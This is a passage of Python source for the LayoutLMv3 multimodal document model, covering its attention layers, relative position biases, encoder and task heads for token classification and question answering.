        # NOTE: bbox is required here — the spatial embedding lookup is unconditional.
        spatial_position_embeddings = self.calculate_spatial_position_embeddings(bbox)
        embeddings = embeddings + spatial_position_embeddings
        embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings)
        return embeddings
class LayoutLMv3PreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = LayoutLMv3Config
    base_model_prefix = "layoutlmv3"
    def _init_weights(self, module):
        """Initialize the weights"""
        if isinstance(module, (nn.Linear, nn.Conv2d)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.padding_idx is not None:
                # Keep the padding embedding at exactly zero after the normal init.
                module.weight.data[module.padding_idx].zero_()
        elif isinstance(module, nn.LayerNorm):
            # LayerNorm starts as the identity transform: scale 1, shift 0.
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
class LayoutLMv3SelfAttention(nn.Module):
    """
    Multi-head self-attention with optional 1D/2D relative attention biases and the
    CogView precision-bottleneck-relaxed softmax for numerical stability.
    """
    def __init__(self, config):
        super().__init__()
        if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
            raise ValueError(
                f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
                f"heads ({config.num_attention_heads})"
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        self.query = nn.Linear(config.hidden_size, self.all_head_size)
        self.key = nn.Linear(config.hidden_size, self.all_head_size)
        self.value = nn.Linear(config.hidden_size, self.all_head_size)
        self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
        self.has_relative_attention_bias = config.has_relative_attention_bias
        self.has_spatial_attention_bias = config.has_spatial_attention_bias
    def transpose_for_scores(self, x):
        # (batch, seq, hidden) -> (batch, num_heads, seq, head_size)
        new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        x = x.view(*new_x_shape)
        return x.permute(0, 2, 1, 3)
    def cogview_attention(self, attention_scores, alpha=32):
        """
        https://arxiv.org/abs/2105.13290 Section 2.4 Stabilization of training: Precision Bottleneck Relaxation
        (PB-Relax). A replacement of the original nn.Softmax(dim=-1)(attention_scores). Seems the new attention_probs
        will result in a slower speed and a little bias. Can use torch.allclose(standard_attention_probs,
        cogview_attention_probs, atol=1e-08) for comparison. The smaller atol (e.g., 1e-08), the better.
        """
        scaled_attention_scores = attention_scores / alpha
        # Subtract the per-row maximum before re-scaling to avoid overflow in softmax.
        max_value = scaled_attention_scores.amax(dim=(-1)).unsqueeze(-1)
        new_attention_scores = (scaled_attention_scores - max_value) * alpha
        return nn.Softmax(dim=-1)(new_attention_scores)
    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        output_attentions=False,
        rel_pos=None,
        rel_2d_pos=None,
    ):
        """Return `(context,)` or `(context, attention_probs)` when `output_attentions` is set."""
        mixed_query_layer = self.query(hidden_states)
        key_layer = self.transpose_for_scores(self.key(hidden_states))
        value_layer = self.transpose_for_scores(self.value(hidden_states))
        query_layer = self.transpose_for_scores(mixed_query_layer)
        # Take the dot product between "query" and "key" to get the raw attention scores.
        # The attention scores QT K/√d could be significantly larger than input elements, and result in overflow.
        # Changing the computational order into QT(K/√d) alleviates the problem. (https://arxiv.org/pdf/2105.13290.pdf)
        attention_scores = torch.matmul(query_layer / math.sqrt(self.attention_head_size), key_layer.transpose(-1, -2))
        if self.has_relative_attention_bias and self.has_spatial_attention_bias:
            # Biases are scaled by 1/√d to match the pre-scaled Q·K scores above.
            attention_scores += (rel_pos + rel_2d_pos) / math.sqrt(self.attention_head_size)
        elif self.has_relative_attention_bias:
            attention_scores += rel_pos / math.sqrt(self.attention_head_size)
        if attention_mask is not None:
            # Apply the attention mask is (precomputed for all layers in RobertaModel forward() function)
            attention_scores = attention_scores + attention_mask
        # Normalize the attention scores to probabilities.
        # Use the trick of the CogView paper to stablize training
        attention_probs = self.cogview_attention(attention_scores)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        attention_probs = self.dropout(attention_probs)
        # Mask heads if we want to
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        context_layer = torch.matmul(attention_probs, value_layer)
        # (batch, heads, seq, head_size) -> (batch, seq, hidden)
        context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
        new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
        context_layer = context_layer.view(*new_context_layer_shape)
        outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
        return outputs
# Based on transformers.models.roberta.modeling_roberta.RobertaSelfOutput
class LayoutLMv3SelfOutput(nn.Module):
    """Post-attention projection: dense -> dropout -> residual add -> LayerNorm."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        projected = self.dropout(self.dense(hidden_states))
        # Residual connection followed by layer normalization.
        return self.LayerNorm(projected + input_tensor)
# Based on transformers.models.layoutlmv2.modeling_layoutlmv2.LayoutLMv2Attention with LayoutLMv2->LayoutLMv3
class LayoutLMv3Attention(nn.Module):
    """Attention sub-block: raw self-attention followed by the residual output projection."""

    def __init__(self, config):
        super().__init__()
        self.self = LayoutLMv3SelfAttention(config)
        self.output = LayoutLMv3SelfOutput(config)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        output_attentions=False,
        rel_pos=None,
        rel_2d_pos=None,
    ):
        attn_results = self.self(
            hidden_states,
            attention_mask,
            head_mask,
            output_attentions,
            rel_pos=rel_pos,
            rel_2d_pos=rel_2d_pos,
        )
        # Project the attention context and add the residual input.
        projected = self.output(attn_results[0], hidden_states)
        # Pass along attention probabilities when the caller requested them.
        return (projected,) + attn_results[1:]
# Based on transformers.models.layoutlmv2.modeling_layoutlmv2.LayoutLMv2Layer with LayoutLMv2->LayoutLMv3
class LayoutLMv3Layer(nn.Module):
    """One transformer encoder layer: attention followed by a chunked feed-forward block."""

    def __init__(self, config):
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        # Chunking (when enabled) is applied along the sequence axis.
        self.seq_len_dim = 1
        self.attention = LayoutLMv3Attention(config)
        self.intermediate = LayoutLMv3Intermediate(config)
        self.output = LayoutLMv3Output(config)

    def forward(
        self,
        hidden_states,
        attention_mask=None,
        head_mask=None,
        output_attentions=False,
        rel_pos=None,
        rel_2d_pos=None,
    ):
        attn_outputs = self.attention(
            hidden_states,
            attention_mask,
            head_mask,
            output_attentions=output_attentions,
            rel_pos=rel_pos,
            rel_2d_pos=rel_2d_pos,
        )
        # The feed-forward block may be evaluated in sequence chunks to bound memory.
        layer_output = apply_chunking_to_forward(
            self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attn_outputs[0]
        )
        # Keep any attention probabilities after the layer output.
        return (layer_output,) + attn_outputs[1:]

    def feed_forward_chunk(self, attention_output):
        # Expansion, activation, then contraction with residual LayerNorm.
        return self.output(self.intermediate(attention_output), attention_output)
class LayoutLMv3Encoder(nn.Module):
    """
    Stack of `LayoutLMv3Layer` modules. Optionally computes shared 1D (sequence) and 2D
    (layout) relative attention biases once per forward pass and feeds them to every layer.
    """
    def __init__(self, config):
        super().__init__()
        self.config = config
        self.layer = nn.ModuleList([LayoutLMv3Layer(config) for _ in range(config.num_hidden_layers)])
        self.gradient_checkpointing = False
        self.has_relative_attention_bias = config.has_relative_attention_bias
        self.has_spatial_attention_bias = config.has_spatial_attention_bias
        if self.has_relative_attention_bias:
            # 1D relative position bias, shared across all layers (T5-style buckets).
            self.rel_pos_bins = config.rel_pos_bins
            self.max_rel_pos = config.max_rel_pos
            self.rel_pos_onehot_size = config.rel_pos_bins
            self.rel_pos_bias = nn.Linear(self.rel_pos_onehot_size, config.num_attention_heads, bias=False)
        if self.has_spatial_attention_bias:
            # 2D relative position bias derived from bounding-box x/y coordinates.
            self.max_rel_2d_pos = config.max_rel_2d_pos
            self.rel_2d_pos_bins = config.rel_2d_pos_bins
            self.rel_2d_pos_onehot_size = config.rel_2d_pos_bins
            self.rel_pos_x_bias = nn.Linear(self.rel_2d_pos_onehot_size, config.num_attention_heads, bias=False)
            self.rel_pos_y_bias = nn.Linear(self.rel_2d_pos_onehot_size, config.num_attention_heads, bias=False)
    def relative_position_bucket(self, relative_position, bidirectional=True, num_buckets=32, max_distance=128):
        """
        Map signed relative distances to bucket indices (T5-style): half the buckets hold
        exact small offsets, the other half cover logarithmically growing ranges up to
        `max_distance`; larger distances all share the last bucket.
        """
        ret = 0
        if bidirectional:
            # Use the high half of the buckets for positive offsets, low half for negative.
            num_buckets //= 2
            ret += (relative_position > 0).long() * num_buckets
            n = torch.abs(relative_position)
        else:
            n = torch.max(-relative_position, torch.zeros_like(relative_position))
        # now n is in the range [0, inf)
        # half of the buckets are for exact increments in positions
        max_exact = num_buckets // 2
        is_small = n < max_exact
        # The other half of the buckets are for logarithmically bigger bins in positions up to max_distance
        val_if_large = max_exact + (
            torch.log(n.float() / max_exact) / math.log(max_distance / max_exact) * (num_buckets - max_exact)
        ).to(torch.long)
        val_if_large = torch.min(val_if_large, torch.full_like(val_if_large, num_buckets - 1))
        ret += torch.where(is_small, n, val_if_large)
        return ret
    def _cal_1d_pos_emb(self, hidden_states, position_ids):
        """Per-head 1D relative position bias of shape (batch, heads, seq, seq)."""
        rel_pos_mat = position_ids.unsqueeze(-2) - position_ids.unsqueeze(-1)
        rel_pos = self.relative_position_bucket(
            rel_pos_mat,
            num_buckets=self.rel_pos_bins,
            max_distance=self.max_rel_pos,
        )
        # One-hot then a bias-free linear layer == a learned per-bucket, per-head scalar.
        rel_pos = F.one_hot(rel_pos, num_classes=self.rel_pos_onehot_size).type_as(hidden_states)
        rel_pos = self.rel_pos_bias(rel_pos).permute(0, 3, 1, 2)
        rel_pos = rel_pos.contiguous()
        return rel_pos
    def _cal_2d_pos_emb(self, hidden_states, bbox):
        """Per-head 2D relative position bias from box left-x and bottom-y coordinates."""
        position_coord_x = bbox[:, :, 0]
        position_coord_y = bbox[:, :, 3]
        rel_pos_x_2d_mat = position_coord_x.unsqueeze(-2) - position_coord_x.unsqueeze(-1)
        rel_pos_y_2d_mat = position_coord_y.unsqueeze(-2) - position_coord_y.unsqueeze(-1)
        rel_pos_x = self.relative_position_bucket(
            rel_pos_x_2d_mat,
            num_buckets=self.rel_2d_pos_bins,
            max_distance=self.max_rel_2d_pos,
        )
        rel_pos_y = self.relative_position_bucket(
            rel_pos_y_2d_mat,
            num_buckets=self.rel_2d_pos_bins,
            max_distance=self.max_rel_2d_pos,
        )
        rel_pos_x = F.one_hot(rel_pos_x, num_classes=self.rel_2d_pos_onehot_size).type_as(hidden_states)
        rel_pos_y = F.one_hot(rel_pos_y, num_classes=self.rel_2d_pos_onehot_size).type_as(hidden_states)
        rel_pos_x = self.rel_pos_x_bias(rel_pos_x).permute(0, 3, 1, 2)
        rel_pos_y = self.rel_pos_y_bias(rel_pos_y).permute(0, 3, 1, 2)
        rel_pos_x = rel_pos_x.contiguous()
        rel_pos_y = rel_pos_y.contiguous()
        rel_2d_pos = rel_pos_x + rel_pos_y
        return rel_2d_pos
    def forward(
        self,
        hidden_states,
        bbox=None,
        attention_mask=None,
        head_mask=None,
        output_attentions=False,
        output_hidden_states=False,
        return_dict=True,
        position_ids=None,
        patch_height=None,
        patch_width=None,
    ):
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None
        # Relative biases are computed once here and shared by all layers.
        rel_pos = self._cal_1d_pos_emb(hidden_states, position_ids) if self.has_relative_attention_bias else None
        rel_2d_pos = self._cal_2d_pos_emb(hidden_states, bbox) if self.has_spatial_attention_bias else None
        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_head_mask = head_mask[i] if head_mask is not None else None
            if self.gradient_checkpointing and self.training:
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs)
                    # return module(*inputs, past_key_value, output_attentions, rel_pos, rel_2d_pos)
                    # The above line will cause error:
                    # RuntimeError: Trying to backward through the graph a second time
                    # (or directly access saved tensors after they have already been freed).
                    return custom_forward
                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module),
                    hidden_states,
                    attention_mask,
                    layer_head_mask,
                    output_attentions,
                    rel_pos,
                    rel_2d_pos,
                )
            else:
                layer_outputs = layer_module(
                    hidden_states,
                    attention_mask,
                    layer_head_mask,
                    output_attentions,
                    rel_pos=rel_pos,
                    rel_2d_pos=rel_2d_pos,
                )
            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if not return_dict:
            return tuple(
                v
                for v in [
                    hidden_states,
                    all_hidden_states,
                    all_self_attentions,
                ]
                if v is not None
            )
        return BaseModelOutput(
            last_hidden_state=hidden_states,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
        )
# Based on transformers.models.roberta.modeling_roberta.RobertaIntermediate
class LayoutLMv3Intermediate(nn.Module):
    """Feed-forward expansion: linear projection to `intermediate_size` plus activation."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
        # The activation may be configured by name (resolved through ACT2FN) or as a callable.
        act = config.hidden_act
        self.intermediate_act_fn = ACT2FN[act] if isinstance(act, str) else act

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        return self.intermediate_act_fn(self.dense(hidden_states))
# Based on transformers.models.roberta.modeling_roberta.RobertaOutput
class LayoutLMv3Output(nn.Module):
    """Feed-forward contraction: project back to `hidden_size`, then residual LayerNorm."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        projected = self.dropout(self.dense(hidden_states))
        # Residual connection followed by layer normalization.
        return self.LayerNorm(projected + input_tensor)
@add_start_docstrings(
    "The bare LayoutLMv3 Model transformer outputting raw hidden-states without any specific head on top.",
    LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3Model(LayoutLMv3PreTrainedModel):
    """
    Multi-modal encoder: embeds text tokens (with layout boxes) and/or image patches,
    concatenates them into one sequence, and runs the shared transformer encoder.
    Either modality may be omitted at call time.
    """
    _keys_to_ignore_on_load_missing = [r"position_ids"]
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        if config.text_embed:
            self.embeddings = LayoutLMv3TextEmbeddings(config)
        if config.visual_embed:
            # use the default pre-training parameters for fine-tuning (e.g., input_size)
            # when the input_size is larger in fine-tuning, we will interpolate the position embeddings in forward
            self.patch_embed = LayoutLMv3PatchEmbeddings(config)
            size = int(config.input_size / config.patch_size)
            self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
            # Learned absolute position embeddings for CLS + each visual patch.
            self.pos_embed = nn.Parameter(torch.zeros(1, size * size + 1, config.hidden_size))
            self.pos_drop = nn.Dropout(p=0.0)
            self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
            self.dropout = nn.Dropout(config.hidden_dropout_prob)
            if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
                self.init_visual_bbox(image_size=(size, size))
            self.norm = nn.LayerNorm(config.hidden_size, eps=1e-6)
        self.encoder = LayoutLMv3Encoder(config)
        self.init_weights()
    def get_input_embeddings(self):
        return self.embeddings.word_embeddings
    def set_input_embeddings(self, value):
        self.embeddings.word_embeddings = value
    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)
    def init_visual_bbox(self, image_size=(14, 14), max_len=1000):
        """
        Create the bounding boxes for the visual (patch) tokens.
        """
        # Evenly partition the 0..max_len coordinate space into the patch grid.
        visual_bbox_x = torch.div(
            torch.arange(0, max_len * (image_size[1] + 1), max_len), image_size[1], rounding_mode="trunc"
        )
        visual_bbox_y = torch.div(
            torch.arange(0, max_len * (image_size[0] + 1), max_len), image_size[0], rounding_mode="trunc"
        )
        visual_bbox = torch.stack(
            [
                visual_bbox_x[:-1].repeat(image_size[0], 1),
                visual_bbox_y[:-1].repeat(image_size[1], 1).transpose(0, 1),
                visual_bbox_x[1:].repeat(image_size[0], 1),
                visual_bbox_y[1:].repeat(image_size[1], 1).transpose(0, 1),
            ],
            dim=-1,
        ).view(-1, 4)
        # The CLS token gets a near-full-page box.
        cls_token_box = torch.tensor([[0 + 1, 0 + 1, max_len - 1, max_len - 1]])
        self.visual_bbox = torch.cat([cls_token_box, visual_bbox], dim=0)
    def calculate_visual_bbox(self, device, dtype, batch_size):
        """Tile the precomputed visual boxes across the batch on the right device/dtype."""
        visual_bbox = self.visual_bbox.repeat(batch_size, 1, 1)
        visual_bbox = visual_bbox.to(device).type(dtype)
        return visual_bbox
    def forward_image(self, pixel_values):
        """Embed an image: patchify, prepend CLS, add position embeddings, normalize."""
        embeddings = self.patch_embed(pixel_values)
        # add [CLS] token
        batch_size, seq_len, _ = embeddings.size()
        cls_tokens = self.cls_token.expand(batch_size, -1, -1)
        embeddings = torch.cat((cls_tokens, embeddings), dim=1)
        # add position embeddings
        if self.pos_embed is not None:
            embeddings = embeddings + self.pos_embed
        embeddings = self.pos_drop(embeddings)
        embeddings = self.norm(embeddings)
        return embeddings
    @add_start_docstrings_to_model_forward(
        LAYOUTLMV3_MODEL_INPUTS_DOCSTRING.format("batch_size, token_sequence_length")
    )
    @replace_return_docstrings(output_type=BaseModelOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        bbox: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        pixel_values: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, BaseModelOutput]:
        r"""
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoProcessor, AutoModel
        >>> from datasets import load_dataset
        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = AutoModel.from_pretrained("microsoft/layoutlmv3-base")
        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]
        >>> encoding = processor(image, words, boxes=boxes, return_tensors="pt")
        >>> outputs = model(**encoding)
        >>> last_hidden_states = outputs.last_hidden_state
        ```"""
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # Resolve batch size / sequence length / device from whichever input is present.
        if input_ids is not None:
            input_shape = input_ids.size()
            batch_size, seq_length = input_shape
            device = input_ids.device
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
            batch_size, seq_length = input_shape
            device = inputs_embeds.device
        elif pixel_values is not None:
            batch_size = len(pixel_values)
            device = pixel_values.device
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds or pixel_values")
        # Text branch: fill in default mask/type/bbox values and embed the tokens.
        if input_ids is not None or inputs_embeds is not None:
            if attention_mask is None:
                attention_mask = torch.ones(((batch_size, seq_length)), device=device)
            if token_type_ids is None:
                token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
            if bbox is None:
                bbox = torch.zeros(tuple(list(input_shape) + [4]), dtype=torch.long, device=device)
            embedding_output = self.embeddings(
                input_ids=input_ids,
                bbox=bbox,
                position_ids=position_ids,
                token_type_ids=token_type_ids,
                inputs_embeds=inputs_embeds,
            )
        final_bbox = final_position_ids = None
        patch_height = patch_width = None
        # Visual branch: embed patches and concatenate them after the text sequence.
        if pixel_values is not None:
            patch_height, patch_width = int(pixel_values.shape[2] / self.config.patch_size), int(
                pixel_values.shape[3] / self.config.patch_size
            )
            visual_embeddings = self.forward_image(pixel_values)
            visual_attention_mask = torch.ones(
                (batch_size, visual_embeddings.shape[1]), dtype=torch.long, device=device
            )
            if attention_mask is not None:
                attention_mask = torch.cat([attention_mask, visual_attention_mask], dim=1)
            else:
                attention_mask = visual_attention_mask
            if self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
                if self.config.has_spatial_attention_bias:
                    visual_bbox = self.calculate_visual_bbox(device, dtype=torch.long, batch_size=batch_size)
                    if bbox is not None:
                        final_bbox = torch.cat([bbox, visual_bbox], dim=1)
                    else:
                        final_bbox = visual_bbox
                visual_position_ids = torch.arange(
                    0, visual_embeddings.shape[1], dtype=torch.long, device=device
                ).repeat(batch_size, 1)
                if input_ids is not None or inputs_embeds is not None:
                    position_ids = torch.arange(0, input_shape[1], device=device).unsqueeze(0)
                    position_ids = position_ids.expand(input_shape)
                    final_position_ids = torch.cat([position_ids, visual_position_ids], dim=1)
                else:
                    final_position_ids = visual_position_ids
            if input_ids is not None or inputs_embeds is not None:
                embedding_output = torch.cat([embedding_output, visual_embeddings], dim=1)
            else:
                embedding_output = visual_embeddings
            embedding_output = self.LayerNorm(embedding_output)
            embedding_output = self.dropout(embedding_output)
        elif self.config.has_relative_attention_bias or self.config.has_spatial_attention_bias:
            # Text-only path: biases are computed from the text boxes/positions alone.
            if self.config.has_spatial_attention_bias:
                final_bbox = bbox
            if self.config.has_relative_attention_bias:
                position_ids = self.embeddings.position_ids[:, : input_shape[1]]
                position_ids = position_ids.expand_as(input_ids)
                final_position_ids = position_ids
        # Broadcastable additive mask (large negative values at padded positions).
        extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(
            attention_mask, None, device, dtype=embedding_output.dtype
        )
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        encoder_outputs = self.encoder(
            embedding_output,
            bbox=final_bbox,
            position_ids=final_position_ids,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            patch_height=patch_height,
            patch_width=patch_width,
        )
        sequence_output = encoder_outputs[0]
        if not return_dict:
            return (sequence_output,) + encoder_outputs[1:]
        return BaseModelOutput(
            last_hidden_state=sequence_output,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
class LayoutLMv3ClassificationHead(nn.Module):
    """
    Sentence-level classification head (dropout -> dense -> tanh -> dropout -> projection).
    Reference: RobertaClassificationHead.
    """

    def __init__(self, config, pool_feature=False):
        super().__init__()
        self.pool_feature = pool_feature
        # Pooled features concatenate three sources, tripling the input width.
        in_features = config.hidden_size * 3 if pool_feature else config.hidden_size
        self.dense = nn.Linear(in_features, config.hidden_size)
        dropout_p = (
            config.classifier_dropout if config.classifier_dropout is not None else config.hidden_dropout_prob
        )
        self.dropout = nn.Dropout(dropout_p)
        self.out_proj = nn.Linear(config.hidden_size, config.num_labels)

    def forward(self, x):
        hidden = torch.tanh(self.dense(self.dropout(x)))
        return self.out_proj(self.dropout(hidden))
@add_start_docstrings(
    """
    LayoutLMv3 Model with a token classification head on top (a linear layer on top of the final hidden states) e.g.
    for sequence labeling (information extraction) tasks such as [FUNSD](https://guillaumejaume.github.io/FUNSD/),
    [SROIE](https://rrc.cvc.uab.es/?ch=13), [CORD](https://github.com/clovaai/cord) and
    [Kleister-NDA](https://github.com/applicaai/kleister-nda).
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForTokenClassification(LayoutLMv3PreTrainedModel):
    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    _keys_to_ignore_on_load_missing = [r"position_ids"]
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.layoutlmv3 = LayoutLMv3Model(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # Small label sets use a plain linear classifier; larger ones use the
        # Roberta-style head (matches the original LayoutLMv3 implementation).
        if config.num_labels < 10:
            self.classifier = nn.Linear(config.hidden_size, config.num_labels)
        else:
            self.classifier = LayoutLMv3ClassificationHead(config, pool_feature=False)
        self.init_weights()
    @add_start_docstrings_to_model_forward(
        LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
    )
    @replace_return_docstrings(output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        bbox: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        pixel_values: Optional[torch.LongTensor] = None,
    ) -> Union[Tuple, TokenClassifierOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoProcessor, AutoModelForTokenClassification
        >>> from datasets import load_dataset
        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = AutoModelForTokenClassification.from_pretrained("microsoft/layoutlmv3-base", num_labels=7)
        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]
        >>> word_labels = example["ner_tags"]
        >>> encoding = processor(image, words, boxes=boxes, word_labels=word_labels, return_tensors="pt")
        >>> outputs = model(**encoding)
        >>> loss = outputs.loss
        >>> logits = outputs.logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.layoutlmv3(
            input_ids,
            bbox=bbox,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            pixel_values=pixel_values,
        )
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]
        seq_length = input_shape[1]
        # only take the text part of the output representations
        sequence_output = outputs[0][:, :seq_length]
        sequence_output = self.dropout(sequence_output)
        logits = self.classifier(sequence_output)
        loss = None
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
        if not return_dict:
            output = (logits,) + outputs[1:]
            return ((loss,) + output) if loss is not None else output
        return TokenClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """
    LayoutLMv3 Model with a span classification head on top for extractive question-answering tasks such as
    [DocVQA](https://rrc.cvc.uab.es/?ch=17) (a linear layer on top of the text part of the hidden-states output to
    compute `span start logits` and `span end logits`).
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForQuestionAnswering(LayoutLMv3PreTrainedModel):
    # The base checkpoint's pooler weights are unused by this head; position_ids are recreated on load.
    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    _keys_to_ignore_on_load_missing = [r"position_ids"]
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.layoutlmv3 = LayoutLMv3Model(config)
        # Span head: maps each position's hidden state to two logits (span start, span end).
        self.qa_outputs = LayoutLMv3ClassificationHead(config, pool_feature=False)
        self.init_weights()
    @add_start_docstrings_to_model_forward(
        LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
    )
    @replace_return_docstrings(output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        start_positions: Optional[torch.LongTensor] = None,
        end_positions: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
